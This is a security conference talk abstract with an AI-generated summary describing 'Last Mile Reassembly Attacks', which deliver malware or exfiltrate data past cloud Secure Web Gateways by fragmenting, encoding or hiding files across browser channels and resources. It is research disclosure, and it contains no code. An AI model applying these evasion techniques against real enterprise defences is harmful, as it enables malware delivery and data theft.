Presentation Material
Abstract
Secure Web Gateways (SWGs) are cloud-based SSL-intercepting proxies and an important component of enterprise Secure Access Service Edge (SASE) or Security Service Edge (SSE) solutions. SWGs ensure secure web access for enterprise users by doing malware protection, threat prevention, URL filtering, and content inspection of sensitive data, among other critical security measures.
Our research indicates that in today’s world of complex web applications and protocols, SWGs often fail to deliver on their promise. We will demonstrate a new class of attacks: “Last Mile Reassembly Attacks,” which, as of this writing, can bypass every SWG in the Gartner Magic Quadrant for SASE and SSE - this includes the largest public market cybersecurity companies in the world. Additionally, we will release an open-source attack toolkit for researchers and red teams to test these attacks on their security solutions and better understand their security exposure.
We aim for our talk to compel SWG vendors to rethink cloud-based client-side web attack detection models, and for enterprises to rethink how they look at securing their users against web threats.
AI Generated Summary
The talk presented architectural vulnerabilities in Secure Web Gateways (SWGs) that allow complete bypass of malware and file-based threat detection. SWGs, which function as cloud-proxied inspection points for enterprise traffic, lack critical browser context such as tab state, DOM changes, and user interactivity. This fundamental limitation, combined with cloud processing constraints like file size limits and poor archive scanning, creates a detection gap.
Researchers demonstrated multiple attack classes exploiting this gap. Unmonitored channels (e.g., WebRTC, WebSockets, gRPC, Server-Sent Events) carry malicious payloads without SWG inspection. Last Mile Reassembly attacks involve fragmenting, encoding, encrypting, or embedding malicious files across multiple network requests or within benign-looking resources (WebAssembly modules, images via steganography, CSS/JS/SVG variables, HTML embeds). The browser reassembles and executes the payload client-side, presenting a seamless “click-to-download” user experience identical to legitimate downloads. Similar techniques exfiltrate data via file uploads by disassembling files into non-file data streams, evading DLP rules.
These attacks render SWG service level agreements—which guarantee prevention of all known malware—technically unachievable due to architectural, not software, flaws. The research underscores that cloud proxies cannot inspect post-proxy client-side execution. The practical implication is that enterprises relying solely on SWGs for threat prevention have a false sense of security. Effective mitigation requires endpoint-integrated security with direct browser visibility to monitor final execution context and reassembled payloads. All demonstrated bypasses worked against major SWG vendors in the Gartner Magic Quadrant. Code and testable demos were released via an open-source platform (browser.security).